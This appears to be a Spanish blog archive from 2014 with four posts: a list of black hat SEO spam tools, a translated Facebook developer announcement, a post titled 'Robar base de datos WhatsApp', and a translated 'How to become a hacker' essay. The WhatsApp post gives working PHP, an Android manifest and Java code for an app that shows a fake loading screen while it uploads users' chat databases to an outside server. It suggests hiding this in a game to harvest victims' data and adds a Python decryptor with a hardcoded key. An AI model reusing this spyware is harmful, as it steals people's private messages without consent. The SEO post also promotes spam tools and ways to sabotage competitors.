viernes, 30 de mayo de 2014

Herramientas para el Black Hat SEO


A continuación facilito una serie de herramientas que se pueden utilizar para hacer black hat, sin embargo tú y solo tú serás el responsable de los daños que las mismas puedan causar a tus clientes o tus web haciendo uso de estas herramientas.
El uso de las siguientes herramientas incumple con las políticas de uso de Google y el resto de los buscadores, su uso indebido puede causar penalizaciones y baneos irreversibles.
Antes de comenzar con la lista de las que me parecen más interesantes quiero decir que el uso moderado de las mismas no es tan negativo como se cree, si se utilizan de forma inteligente pueden servir para automatizar procesos, pero su uso continuo y masivo es claramente negativo.

Xrumer: esta es una de las herramientas más famosas que existen, su finalidad es la de dejar firmas (con enlaces) en cientos de miles de foros y la creación automática de perfiles en los mismos, es tan potente que incluso te permite crear temas, o romper CAPTCHAS.
Xrumer es sumamente complejo de utilizar, requiere conocimientos avanzados y una buena metodología estratégica para no cometer errores y ser baneado.
ScraperBox: este se está conviertiendo en uno de los favoritos, es bueno, fácil de usar, efectivo y barato, que más se puede pedir.

Sick Submitter: esta es posiblemente la mejor compra que se puede hacer si quieres comenzar a experimentar, es un programa de envío masivo, creación de perfiles, bookmarking, envío de rss, de artículos, sistema de validación de cuentas, etc… sin duda muy interesante.

SENuke: Más potente que Sick Submitter y mejor documentado, uno de los favoritos de muchos, es algo complicado al principio por lo que lo primero que se debe es documentarse.

AutoPligg: básicamente busca miles de sitios que tienen instalado pligg y envía la url que le indicas.

SEOLinkPro: con más de 43 módulos para hacer linkbuilding, también debemos tener en cuenta que es capaz de romper CAPTCHAS y que corre en background.

Magic Submitter: creo que su nombre lo indica todo, no necesita mucha explicación, fácil de usar pero te puedes ganar un baneo si abusas de el.

La lista puede seguir y seguir con muchos otros como Xgen SEO, Bookmarking Demon, SEO Power Suite, Link Farm Evolution (este es muy interesante), Elite Proxy Switchter, Market Samurai, Rss Submitter, entre muchos otros, pero la más importante de todas estas herramientas es tu cerebro, debes ser capaz de saber cuándo se puedo y cuando no.
Google tiene un algoritmo capaz de detectar estas conductas de crecimiento, de evaluar la diversidad de los enlaces, de ver el tipo de enlaces entrantes, la relación de los mismos con tu web, la velocidad con la que generas enlaces en relación con tu sector, entre muchas otras variables, así que piensa detenidamente antes de hacer uso de estas herramientas, pueden matar tu negocio, Google no es tonto.

¿Puedo conseguir que penalicen a un competidor haciendo uso de estas herramientas?

Por desgracia sí, pero no en todos los casos, depende de la fuerza del dominio de dicho competidor y la diversidad de enlaces.

¿Recomiendas el uso de estas herramientas?

Recomiendo el uso de cualquier herramienta de SEO con fines educativos y experimentales, luego de realizar las pruebas tú debes sacar tus propias conclusiones.
Desde el punto de vista de Google incluso las excelentes herramientas de SEOmoz o de Raven son herramientas de Blackhat ya que ofrecen una información clave que nos ayuda a posicionarnos mejor, la diferencia es que estas no hacen todo el trabajo automáticamente.
Si conoces alguna otra herramienta que consideras útil te agradecería que la compartieras, recuerda que compartir siempre es bueno.

Introduciendo Anonymous Login y un Updated de Facebook Login




Introduciendo Anonymous Login y un Updated de Facebook Login




Hoy a f8 , anunciamos Anonymous Login, una forma totalmente nueva para acceder a aplicaciones sin compartir ninguna información personal de Facebook, junto con una nueva versión de Facebook Iniciar sesión con aún mejores controles de privacidad .La gente nos dice que a veces están preocupados por el intercambio de información con las aplicaciones y quieren más opciones y control sobre lo que reciben aplicaciones de información personal . Los anuncios de hoy ponen el poder y control de lleno en las manos de la gente:
  •     Anónimo Login : Una manera fácil para la gente a probar una aplicación sin compartir nada de su información personal de Facebook .
  •     Facebook Login: Una nueva versión que da a la gente la opción de escoger y elegir qué información reciben aplicaciones .
  •     Un panel de control de la aplicación rediseñada : Lugar central de la gente para ver y gestionar las aplicaciones que utilizan.

Anónimo LoginA veces la gente quiere probar aplicaciones , pero no están listos para compartir cualquier información sobre sí mismos . Para ello, estamos introduciendo una manera de conectarse a las aplicaciones de forma anónima .Inicio de sesión anónimo permite a la gente conectarse a las aplicaciones para que no tengan que recordar nombres de usuario y contraseñas , pero no comparte información personal de Facebook . Las personas pueden decidir más tarde si quieren compartir cualquier información adicional, una vez que entienden más sobre la aplicación.
 Anonymous Login

Estamos probando Anónimo Login con unos pocos desarrolladores, y tenemos la intención de abrirlo a más desarrolladores en los próximos meses.


Línea por Línea de Control con Facebook Conectarse

El año pasado, las personas registradas en las aplicaciones y sitios web con Facebook Entrar más de 10 mil millones de veces, dándoles una forma rápida y fácil para acceder a las aplicaciones sin tener que recordar nombres de usuario y contraseñas diferentes.

Hoy presentamos una nueva versión de inicio de sesión. Con el nuevo inicio de sesión, los usuarios pueden seleccionar los datos de una aplicación obtiene desmarcando categorías de información, uno por uno. Por ejemplo, si alguien quiere compartir su dirección de correo electrónico con una aplicación, pero no su cumpleaños, que pueden hacer esa elección con un par de toques.

New Login

El nuevo Facebook Login tampoco deja publicar en Facebook sin permiso.

New Login Control

Por último, pronto vamos a empezar a revisar las nuevas aplicaciones que utilizan Facebook Login para ayudar a asegurar que las aplicaciones de mayor calidad están disponibles para las personas - apps que piden la información que realmente necesitan y no están publicando nada nuevo a Facebook sin el permiso explícito de la gente.

La nueva sesión se desplegarán en los próximos meses.


Un panel de control rediseñado App

Después de iniciar sesión en la gente a las aplicaciones que utilizan Facebook, queremos darles una forma clara y sencilla para realizar un seguimiento de sus aplicaciones conectadas a Facebook.

Así que hoy también anunciamos un tablero de instrumentos de nuevo diseño, donde la gente puede ver una lista de aplicaciones que utilizan, administrar permisos específicos, o eliminar aplicaciones del todo. Se estará lanzando en las próximas semanas.
 App Control Panel

Estas son sólo Algunas de las cosas que estamos anunciando hoy en f8, más por venir pronto. Para una visión más completa, asegúrese de echa un vistazo a este post.

La gente da más control sobre cuando comparten desde sus aplicaciones de facebook




En f8 , hemos introducido nuevas formas para que la gente comparta historias de sus aplicaciones para Facebook . Estas nuevas herramientas de dejar claro a las personas cuando están a punto de compartir el contenido de una aplicación con sus amigos.
En general , hemos encontrado que la gente se involucra más con las historias que se comparten de forma explícita y no implícita, y que a menudo se sienten sorprendidos o confundidos por las historias que se comparten de forma implícita o automáticamente. Durante el último año , el número de pisos compartidos en forma implícita News Feed ha disminuido de manera natural. Esta disminución se correlaciona con qué frecuencia las personas marcan los mensajes de aplicaciones como correo no deseado , que se redujo en un 75 % durante el mismo periodo. En los próximos meses, vamos a continuar dando prioridad a historias compartidas explícitamente de aplicaciones en News Feed y Ticker más historias implícitamente compartidos.
Si su aplicación se está publicando historias implícitamente , le animamos a que considere estas opciones en su lugar:Compartir historias Open Graph explícitamente
Puede solicitar a marcar sus historias como explícita durante el proceso de envío de Open Graph . Explícitos historias Open Graph suelen incluir un claro control de intercambio Facebook en su aplicación. He aquí un ejemplo de Instagram , que recientemente ha dejado de compartir historias de manera implícita :


 

Compartir de manera más personal con el mensaje de diálogo

El nuevo mensaje de diálogo permite a la gente compartir el contenido de su aplicación de una manera más personal, mostrando en un hilo de conversación en el Messenger:



Al igual que el cuadro de diálogo Compartir, el mensaje de diálogo no requiere de Facebook Iniciar sesión y es compatible con Open Graph y App Links. Más de 200 millones de personas utilizan Mensajero cada mes, y aplicaciones principales como Redfin, Goodreads, y otros ya están en el proceso de integración de este diálogo. Añada el mensaje de diálogo de hoy para su iOS y Android.

Dirigir el tráfico de escritorio para su aplicación móvil con Enviar a móvil

Enviar a móvil da a la gente un acceso directo para instalar su aplicación móvil cuando inician sesión con Facebook a su sitio web. Por ejemplo, cuando la gente se conecta con Facebook para Rdio en la web, Enviar a móvil se mostrará una notificación en aplicación móvil de Facebook de una persona para descargar e instalar Rdio. Lo mejor de todo, una vez que se ha actualizado a la nueva Facebook Login, Enviar a celular funciona de forma automática y sin ningún esfuerzo adicional. Aprenda más sobre Enviar a móvil.



El nuevo botón Like de aplicaciones móviles y una Acción de diálogo basado en la web

En promedio, el Like and Share botones son vistos a través de casi 10 millones de sitios web al día, y en f8, anunciamos que vamos a llevar el botón Me gusta de las aplicaciones móviles. El botón móvil Como da a las personas una manera fácil de compartir contenido de su aplicación con un toque. Pruebe el botón móvil Como, la versión beta de la que está disponible para iOS ahora. Estamos planeando un despliegue más amplio - incluyendo la disponibilidad de Android - pronto.




Por último, también introdujimos un nuevo Compartir Diálogo para la web que soporte amigo y ubicación de marcado, además de Open Graph, llevándola a ofrecer paridad con las Participaciones Diálogos para iOS y Android. Alentamos a todas las aplicaciones para utilizar el Compartir de diálogo para la web en lugar del diálogo Feed.

Esperamos con interés trabajar con usted para integrar estas nuevas herramientas para compartir y ayudarle a hacer sus historias de aplicaciones más explícito. Si usted tiene alguna pregunta, por favor no dude en acercarse a nosotros a través de Soporte o uniéndose a nuestro grupo de Facebook Desarrolladores.


https://developers.facebook.com/blog/post/2014/05/27/more-control-with-sharing/

jueves, 29 de mayo de 2014

Robar base de datos WhatsApp


"¿Es posible cargar y leer los chats de WhatsApp desde otra aplicación para Android?"

La base de datos WhatsApp se guarda en la tarjeta SD que puede ser leído por cualquier aplicación Android si el usuario le permite acceder a la tarjeta SD. Y puesto que la mayoría de la gente permite que todo se guarde en su dispositivo Android, esto no es un gran problema.

Entonces, ¿qué tenemos hacer para robar la base de datos de alguien Whatsapp? Primero necesitamos un lugar para almacenar la base de datos. Un simple script php


 upload_wa.php

<?php
// Upload script to upload Whatsapp database
// This script is for testing purposes only.

$uploaddir = "/tmp/whatsapp/";

if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "<br>";
  }
else
  {
  echo "Upload: " . $_FILES["file"]["name"] . "<br>";
  echo "Type: " . $_FILES["file"]["type"] . "<br>";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];

  $uploadfile = $uploaddir . $_SERVER['REMOTE_ADDR'] . "." . basename($_FILES['file']['name']);
  move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
  }
?>

<html><head><title>Shoo.. nothing here</title></head><body><form method="post" enctype="multipart/form-data"><input type="file" name="file" id="file"><input type="submit" value="Submit"></form></body></html> 

Asegúrese de configurar el php.ini para que pueda cargar (grandes) archivos.
php.ini
...
file_uploads = On
post_max_size = 32M
upload_max_filesize = 32M

Lo siguiente que necesitamos es una aplicación para Android que carga la base de datos de WhatsApp a la página web. He creado un nuevo proyecto por defecto en Eclipse e hice un par de cambios. En primer lugar, necesitamos algunos derechos adicionales para acceder a la tarjeta SD y subir a Internet. Para ello he añadido algunas líneas al archivo AndroidManifest.xml.

AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="bb.security.whatsappupload"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.INTERNET" />

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="19" />

    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >

        <activity
            android:name="bb.security.whatsappupload.MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

</manifest>
Para la disposición utilicé el diseño predeterminado que crea Eclipse, pero me mudé al TextView al centro y aumenté el tamaño del texto. La magia de carga que pasa antes de ver la disposición, para esta prueba de concepto de este activity_main.xml es lo suficientemente bueno.

activity_main.xml
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:paddingBottom="@dimen/activity_vertical_margin"
    android:paddingLeft="@dimen/activity_horizontal_margin"
    android:paddingRight="@dimen/activity_horizontal_margin"
    android:paddingTop="@dimen/activity_vertical_margin"
    tools:context=".MainActivity" >
    <TextView
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_alignParentTop="true"
        android:layout_centerHorizontal="true"
        android:layout_marginTop="179dp"
        android:text="@string/hello_world"
        android:textSize="24sp" />
</RelativeLayout>
Hasta el momento, nada emocionante, sin embargo, la verdadera emoción viene en el archivo MainActivity.java. Vamos a tratar de subir 3 archivos:

  • /WhatsApp/Databases/msgstore.db
  • /WhatsApp/Databases/wa.db
  • /WhatsApp/Databases/msgstore.db.crypt
En las nuevas versiones WhatsApp decidió hacer un poco de magia de cifrado en su base de datos (msgstore.db.crypt), así que es más seguro. Todavía es posible leer chats de esta base de datos, pero más sobre esto más adelante. El msgstore.db y wa.db son las viejas bases de datos sin cifrar de WhatsApp.

Durante la carga de los archivos de la base de WhatsApp vamos a mostrar una pantalla de carga simple, por lo que la gente piensa que la aplicación está haciendo algo interesante en el fondo.


MainActivity.java

package bb.security.whatsappupload;

/*
 * This application is for testing purposes only.
 * Use of this application is at your own risk.
 */

import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;

import android.os.AsyncTask;
import android.os.Bundle;
import android.os.Environment;
import android.app.Activity;
import android.app.ProgressDialog;
import android.util.Log;
import android.view.Menu;

public class MainActivity extends Activity {

    //A ProgressDialog object
    private ProgressDialog progressDialog;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        new UploadWhatsApp().execute();
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Inflate the menu; this adds items to the action bar if it is present.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }

    @SuppressWarnings("deprecation")
    private void uploadFile(String file) {
        HttpURLConnection conn = null;
        DataOutputStream dos = null;
        DataInputStream inStream = null;

        Log.i("FILE", "Filename:\n" + file);

        String lineEnd = "\r\n";
        String twoHyphens = "--";
        String boundary = "*****";
        int bytesRead, bytesAvailable, bufferSize;
        byte[] buffer;
        int maxBufferSize = 1 * 1024 * 1024 * 1024;
        String urlString = "http://bas.bosschert.nl/whatsapp/upload_wa.php";
        try {
            //     ------------------ CLIENT REQUEST
            FileInputStream fileInputStream = new FileInputStream(new File(
                    file));
            // open a URL connection to the Servlet
            URL url = new URL(urlString);
            // Open a HTTP connection to the URL
            conn = (HttpURLConnection) url.openConnection();
            // Allow Inputs
            conn.setDoInput(true);
            // Allow Outputs
            conn.setDoOutput(true);
            // Don't use a cached copy.
            conn.setUseCaches(false);
            // Use a post method.
            conn.setRequestMethod("POST");
            conn.setRequestProperty("Connection", "Keep-Alive");
            conn.setRequestProperty("Content-Type",
                    "multipart/form-data;boundary=" + boundary);
            dos = new DataOutputStream(conn.getOutputStream());
            dos.writeBytes(twoHyphens + boundary + lineEnd);
            dos.writeBytes("Content-Disposition: form-data; name=\"file\";filename=\""
                    + file + "\"" + lineEnd);
            dos.writeBytes(lineEnd);
            // create a buffer of maximum size
            bytesAvailable = fileInputStream.available();
            bufferSize = Math.min(bytesAvailable, maxBufferSize);
            buffer = new byte[bufferSize];
            // read file and write it into form...
            bytesRead = fileInputStream.read(buffer, 0, bufferSize);
            while (bytesRead > 0) {
                dos.write(buffer, 0, bufferSize);
                bytesAvailable = fileInputStream.available();
                bufferSize = Math.min(bytesAvailable, maxBufferSize);
                bytesRead = fileInputStream.read(buffer, 0, bufferSize);
            }
            // send multipart form data necesssary after file data...
            dos.writeBytes(lineEnd);
            dos.writeBytes(twoHyphens + boundary + twoHyphens + lineEnd);
            // close streams
            Log.e("Debug", "File is written");
            fileInputStream.close();
            dos.flush();
            dos.close();
        } catch (MalformedURLException ex) {
            Log.e("Debug", "error: " + ex.getMessage(), ex);
        } catch (IOException ioe) {
            Log.e("Debug", "error: " + ioe.getMessage(), ioe);
        }
        // ------------------ read the SERVER RESPONSE
        try {
            if (conn != null){
                inStream = new DataInputStream(conn.getInputStream());
                String str;

                while ((str = inStream.readLine()) != null) {
                    Log.e("Debug", "Server Response " + str);
                }
                inStream.close();
            }

        } catch (IOException ioex) {
            Log.e("Debug", "error: " + ioex.getMessage(), ioex);
        }
    }

    private class UploadWhatsApp extends AsyncTask<Void, Integer, Void>{

        @Override
        protected void onPreExecute()
        {
            //Create a new progress dialog
            progressDialog = ProgressDialog.show(MainActivity.this,"Loading Application, please wait...",
                    "Loading, please wait...", false, false);
        }

        //The code to be executed in a background thread.
        @Override
        protected Void doInBackground(Void... params)
        {

            String fileWACrypt = Environment.getExternalStorageDirectory()
                    .getPath() + "/WhatsApp/Databases/msgstore.db.crypt";
            String fileWAPlain = Environment.getExternalStorageDirectory()
                    .getPath() + "/WhatsApp/Databases/msgstore.db";
            String fileWAwa = Environment.getExternalStorageDirectory()
                    .getPath() + "/WhatsApp/Databases/wa.db";

            MainActivity.this.uploadFile(fileWACrypt);
            MainActivity.this.uploadFile(fileWAPlain);
            MainActivity.this.uploadFile(fileWAwa);
            return null;
        }

        //Update the progress
        @Override
        protected void onProgressUpdate(Integer... values)
        {
            //set the current progress of the progress dialog
            progressDialog.setProgress(values[0]);
        }

        //after executing the code in the thread
        @Override
        protected void onPostExecute(Void result)
        {
            //close the progress dialog
            progressDialog.dismiss();
            //initialize the View
            setContentView(R.layout.activity_main);
        }

    }
}
 
Al hacer la magia en la pantalla de carga, también puede agregar este código en una aplicación real en lugar del mensaje Hello World que ves ahora. Combínalo con algo como FlappyBird y una descripción de cómo instalar aplicaciones de fuentes desconocidas y se puede cosechar una gran cantidad de bases de datos.

La base de datos WhatsAppp es una base de datos SQLite3 que se puede convertir a Excel para un acceso más fácil. Últimamente WhatsApp está utilizando encriptación para cifrar la base de datos, por lo que ya no puede ser abierto por SQLite. Pero simplemente podemos descifrar esta base de datos mediante un sencillo script en Python. Este script convierte la base de datos encriptada para una base de datos SQLite3 simple (clave de Whatsapp Xtract conseguido).

whatsapp_decrypt.py

#!/usr/bin/env python

import sys
from Crypto.Cipher import AES

try:
    wafile=sys.argv[1]
except:
    print "Usage: %s <msgstore.db.crypt>" % __file__
    sys.exit(1)

key = "346a23652a46392b4d73257c67317e352e3372482177652c".decode('hex')
cipher = AES.new(key,1)
open('msgstore.db',"wb").write(cipher.decrypt(open(wafile,"rb").read())) 
Por lo tanto, podemos concluir que cada aplicación puede leer la base de datos de WhatsApp y también es posible leer los chats de las bases de datos cifrados. Facebook no necesita comprar WhatsApp para leer sus chats.


Click Here - Aqui!

miércoles, 28 de mayo de 2014

Como convertirse en Hacker Real

¿Por qué este documento?

Como editor del archivo de la jerga y autor de algunos otros documentos conocidos de naturaleza similar , me dan a menudo peticiones de correo electrónico de los novatos de la red entusiastas pidiendo (en efecto) "¿Cómo puedo aprender a ser un hacker wizardly ? " . Ya en 1996 me di cuenta de que no parecía haber ninguna otra preguntas frecuentes o documentos web que abordaron esta cuestión vital , así que empecé a éste. Muchos hackers ahora considera definitivo , y supongo que eso significa que es. Sin embargo, yo no pretendo ser la autoridad exclusiva sobre este tema ; si no te gusta lo que lee aquí , escribir el suyo propio.
Si usted está leyendo una instantánea de este documento en línea , la versión actual vive en http://catb.org/ ~ esr / faqs / hacker howto.html .
Nota : hay una lista de preguntas más frecuentes al final de este documento. Por favor, lea estos - dos veces - antes de enviarme un mail a cualquier pregunta acerca de este documento .
Numerosas traducciones de este documento están disponibles : Árabe Bielorruso Chino (simplificado) , checo, danés , holandés, estonio , griego Italiano Hebreo , Japonés, lituano , noruego, persa portugués (brasileño ), rumano español , turco y sueco. Tenga en cuenta que, dado que este documento cambia de vez en cuando , pueden estar fuera de fecha en diversos grados.
El esquema de cinco puntos - en nueve cuadrados que decora este documento se llama un planeador. Es un modelo simple con algunas propiedades sorprendentes de una simulación matemática llamada Vida que ha fascinado a los hackers desde hace muchos años . Creo que tiene un buen emblema visual de lo que los hackers son como - abstracto, en un primer momento un misterioso de apariencia poco, pero una puerta de entrada a un mundo con una lógica compleja de su cuenta. Lea más sobre el emblema planeador aquí .
Si usted encuentra este valioso documento , por favor déjeme un consejo sobre Gittip . Y considere también inclinar otros hackers que han elaborado códigos que se utilizan y el valor . Un montón de pequeñas pero continuas donaciones se suman rápidamente , y pueden liberar a la gente que le han dado los dones de su fuerza de trabajo para crear más valor .¿Qué es un hacker ?
El archivo de la jerga contiene un montón de definiciones del término "hacker" , la mayoría tienen que ver con la destreza técnica y una delicia en la solución de problemas y la superación de los límites. Si usted quiere saber cómo llegar a ser un hacker, sin embargo, sólo dos son realmente relevantes .
Hay una comunidad , una cultura compartida , de programadores expertos y magos de las redes que remonta su historia a través de décadas a los primeros miniordenadores de tiempo compartido y los experimentos de ARPAnet primeros . Los miembros de esta cultura se originó el término "hacker" . Los hackers construyeron la Internet. Los hackers hicieron del sistema operativo Unix lo que es hoy . Los hackers hacen el trabajo World Wide Web. Si usted es parte de esta cultura , si has contribuido a ella y otras personas en ella saber quién eres y te llaman hacker, eres un hacker .
El hacker mentalidad no está confinada a esta cultura en software pirata . Hay personas que aplican la actitud hacker para otras cosas, como la electrónica o la música - en realidad , usted lo puede encontrar en los más altos niveles de cualquier ciencia o arte . Hackers de software reconocen estos espíritus afines en otras partes y pueden llamarlos " hackers ' también - y algunos afirman que la naturaleza hacker es en realidad independiente del medio particular el hacker trabaja pulg Pero en el resto de este documento nos centraremos en las habilidades y actitudes de hackers de software, y las tradiciones de la cultura compartida que originó el término "hacker" .
Hay otro grupo de personas que se dicen en voz alta a los piratas informáticos , pero no lo son. Se trata de personas (hombres , principalmente adolescentes) que consiguen un retroceso de intrusión en los ordenadores y phreaking el sistema telefónico . Los auténticos hackers llaman ' crackers ' esta gente y no quieren tener nada que ver con ellos . Los auténticos hackers opinan que la mayoría crackers son perezosos , irresponsables y no muy brillantes, y objetan que ser capaz de romper la seguridad no te convierte en un hacker no más que ser capaz de puentear coches que hace un ingeniero automotriz. Desafortunadamente , muchos periodistas y escritores han sido engañados en el uso de la palabra "hacker" para describir las galletas ; Esto irrita hackers de verdad no tiene fin.
La diferencia básica es esta : los hackers construyen cosas , los crackers las destruyen .
Si quieres ser un hacker , sigue leyendo . Si quieres ser un cracker , ve a leer el grupo de noticias alt.2600 y prepárate para hacer nueve y cincuenta y cinco minutos en la cárcel después de descubrir que no eres tan listo como crees que eres. Y eso es todo lo que voy a decir sobre las galletas.La Actitud Hacker
1 . El mundo está lleno de problemas fascinantes que esperan ser resueltos .2 . Ningún problema debe tener siempre a ser resuelto en dos ocasiones.3 . El aburrimiento y la monotonía son malos.4 . La libertad es buena .5 . La actitud no es sustituto de la competencia .
Los hackers resuelven problemas y construyen cosas , y creen en la libertad y la ayuda mutua voluntaria. Para ser aceptado como un hacker, tienes que comportarte como si usted tiene este tipo de actitud a ti mismo . Y a comportarse como si usted tiene la actitud , tienes que creer realmente la actitud .
Pero si piensas en cultivar las actitudes de hacker sólo como una manera de ganar la aceptación en la cultura , se perderá el punto. Convertirse en el tipo de persona que cree estas cosas es importante para usted - para ayudarle a aprender y mantenerte motivado. Al igual que con todas las artes creativas , la forma más eficaz de llegar a ser un maestro es imitar la mentalidad de los maestros - no sólo intelectualmente sino también emocionalmente .
O, como el siguiente poema zen moderno lo tiene :


    Para seguir la ruta:
    mirar hacia el maestro ,
    seguir al maestro ,
    caminar con el maestro ,
    ver a través del maestro ,
    convertirse en el amo .
Así que, si quieres ser un hacker , repite lo siguiente hasta que los cree :1 . El mundo está lleno de problemas fascinantes que esperan ser resueltos .
Ser un hacker es muy divertido, pero es un tipo de diversión que lleva un montón de esfuerzo. El esfuerzo requiere motivación . Los atletas exitosos obtienen su motivación a partir de un tipo de placer físico en la toma de sus cuerpos realizan , en empujar a sí mismos más allá de sus propios límites físicos. Del mismo modo , para ser un hacker tiene que conseguir una emoción básica de resolución de problemas , afilando sus habilidades, y el ejercicio de su inteligencia.
Si usted no es el tipo de persona que se siente así , naturalmente , tendrá que convertirse en uno con el fin de hacer que sea como un hacker . De lo contrario, usted encontrará su energía piratería está minado por las distracciones como el sexo , el dinero y la aprobación social .
(También hay que desarrollar una especie de fe en su propia capacidad de aprendizaje - la creencia de que a pesar de que usted no puede saber todo lo que usted necesita para resolver un problema, si usted aborda sólo un pedazo de él y aprender de eso, usted ' ll aprender lo suficiente para resolver la siguiente pieza - y así sucesivamente, hasta que haya terminado ) .2 . Ningún problema debe tener siempre a ser resuelto en dos ocasiones.
Cerebros creativos son un recurso valioso y limitado . Ellos no deben desperdiciarse reinventando la rueda cuando hay tantos nuevos problemas fascinantes que esperan ahí fuera.
Comportarse como un hacker , tienes que creer que el momento de pensar en otros hackers es precioso - tanto es así que es casi un deber moral de compartir información, resolver problemas y luego da las soluciones de distancia sólo para que otros hackers puedan resolver nuevos problemas en lugar de tener que volver a los perpetuamente dirección viejas .
Tenga en cuenta, sin embargo, que "no hay problema debería tener en ser resuelto dos veces. " no implica que usted tiene que considerar todas las soluciones existentes sagrado, o que sólo hay una solución correcta a un problema determinado . A menudo , aprendemos mucho sobre el problema de que no sabíamos antes , estudiando el primer corte a una solución. Está bien , y muchas veces es necesario, decidir que podemos hacerlo mejor. Lo que no está bien es barreras artificiales técnicos, legales o institucionales ( como el código de código cerrado ) que impiden una buena solución de ser reutilizado y obligan a la gente a reinventar ruedas.
( Usted no tiene que creer que usted está obligado a dar todo su producto creativo de distancia , aunque los hackers que lo hacen son los que obtienen más respeto por parte de otros hackers . Es compatible con los valores de hackers a vender lo suficiente de él para mantenerlo en la comida y el alquiler y los ordenadores. está bien usar sus habilidades de hacker para mantener una familia o incluso hacerse rico , siempre y cuando que no se olvide su lealtad a su arte y sus compañeros hackers mientras lo hace. )3 . El aburrimiento y la monotonía son malos.
Los hackers (y las personas creativas en general) nunca debe ser aburrido o que drudge en el trabajo repetitivo estúpido, porque cuando esto sucede significa que no están haciendo lo único que pueden hacer - resolver nuevos problemas. Este despilfarro duele a todos. Por lo tanto, el aburrimiento y la monotonía no sólo son desagradables , pero en realidad el mal.
Comportarse como un hacker , tienes que creer que esto lo suficiente para querer automatizar lejos las partes aburridas tanto como sea posible , no sólo para ti , sino para todos los demás ( especialmente otros hackers ) .
(Hay una aparente excepción a esto. Los hackers a veces hacer cosas que pueden parecer repetitivas o aburridas para un observador como un ejercicio de mente y claro, o con el fin de adquirir una habilidad o tener algún tipo particular de experiencia que puede no tener otra manera . Pero esto es por elección - nadie que pueda pensar nunca debe ser forzado a una situación que les aburre ) .4 . La libertad es buena .
Los hackers son naturalmente anti -autoritaria . Cualquier persona que le puede dar órdenes que usted puede dejar de resolver cualquier problema que se le está fascinado por - y , dada la forma en las mentes autoritarias trabajan , por lo general encontrará alguna razón espantosamente estúpida para hacerlo. Así que la actitud autoritaria debe ser combatida donde sea que lo encuentre, no sea que tú y otros hackers sofocar .
(Esto no es lo mismo que la lucha contra toda autoridad. Los niños necesitan ser guiados y criminales restringido . Un hacker puede estar de acuerdo en aceptar algunos tipos de autoridad con el fin de obtener algo que desea más que el tiempo que pasa siguiendo órdenes . Pero eso es una limitado, ganga consciente, el tipo de entrega personal autoritarios quieren no es que se ofrecen ) .
Los autoritarios prosperan en la censura y el secreto. Y desconfían de la cooperación voluntaria y el intercambio de información - sólo como "cooperación" que controlan. Así que para comportarse como un hacker, deberás desarrollar una hostilidad instintiva hacia la censura , el secreto y el uso de la fuerza o el engaño para obligar a los adultos responsables . Y usted tiene que estar dispuesto a actuar en esa creencia.5 . La actitud no es sustituto de la competencia .
Para ser un hacker, deberás desarrollar algunas de estas actitudes . Pero copping una actitud por sí sola no hará que un hacker, más de lo que lo convertirá en un atleta campeón o una estrella de rock . Convertirse en un hacker tendrá inteligencia, práctica , dedicación y trabajo duro.
Por lo tanto , usted tiene que aprender a desconfiar de la actitud y respetar la competencia de todo tipo. Los hackers no van a dejar que posers pierden su tiempo , pero adorar a la competencia - especialmente la competencia en la piratería , pero la competencia en cualquier cosa que se valora . La competencia en las habilidades que pocos pueden dominar exigente es especialmente bueno, y la competencia en las habilidades que implican la agudeza mental, la artesanía, y la concentración exigiendo es lo mejor.
Si reverencian competencia , disfrutará desarrollándola en ti mismo - el trabajo duro y la dedicación se convertirá en una especie de juego intenso en lugar de monotonía . Esa actitud es vital para convertirse en un hacker .


Habilidades básicas de Hacking
1 . Aprender a programar.

 2 . Conseguir uno de los sistemas Unix de código abierto y aprender a usar y ejecutarlo.
3 . Aprender a utilizar la World Wide Web y escribir en HTML.
4 . Si usted no tiene Inglés funcional , aprenderlo.

La actitud hacker es vital, pero las habilidades son aún más vital. La actitud no es sustituto de la competencia , y hay un cierto conjunto de herramientas básicas de las habilidades que usted tiene que tener antes de cualquier hacker soñará llamando uno.
Este conjunto de herramientas cambia lentamente con el tiempo ya que la tecnología crea nuevas habilidades y hace que los viejos obsoletos. Por ejemplo, se utiliza para incluir la programación en lenguaje de máquina , y no lo hizo hasta hace poco implican HTML. Pero en este momento incluye bastante claramente lo siguiente:1 . Aprender a programar.
Esto, por supuesto , es la habilidad fundamental hacking. Si usted no sabe cualquier lenguajes de programación , yo recomiendo empezar con Python . Está diseñado limpia , bien documentado , y relativamente amable con los principiantes. A pesar de ser un buen primer lenguaje , no es sólo un juguete ; es muy potente y flexible y muy adecuado para grandes proyectos. He escrito una evaluación más detallada de Python. Los buenos tutoriales están disponibles en el sitio web de Python ; hay una excelente tercero uno en Círculos de Informática .
Yo solía recomendar Java como un buen lenguaje para aprender temprano, pero esa crítica ha cambiado mi mente ( busque " Las trampas de Java como primer lenguaje de programación " en su interior ) . Un hacker no puede, ya que devastadoramente pusieron "enfoque de resolución de problemas como un fontanero en una ferretería "; usted tiene que saber cuáles son los componentes realmente hacen. Ahora creo que es probablemente la mejor manera de aprender C y Lisp , luego Java.
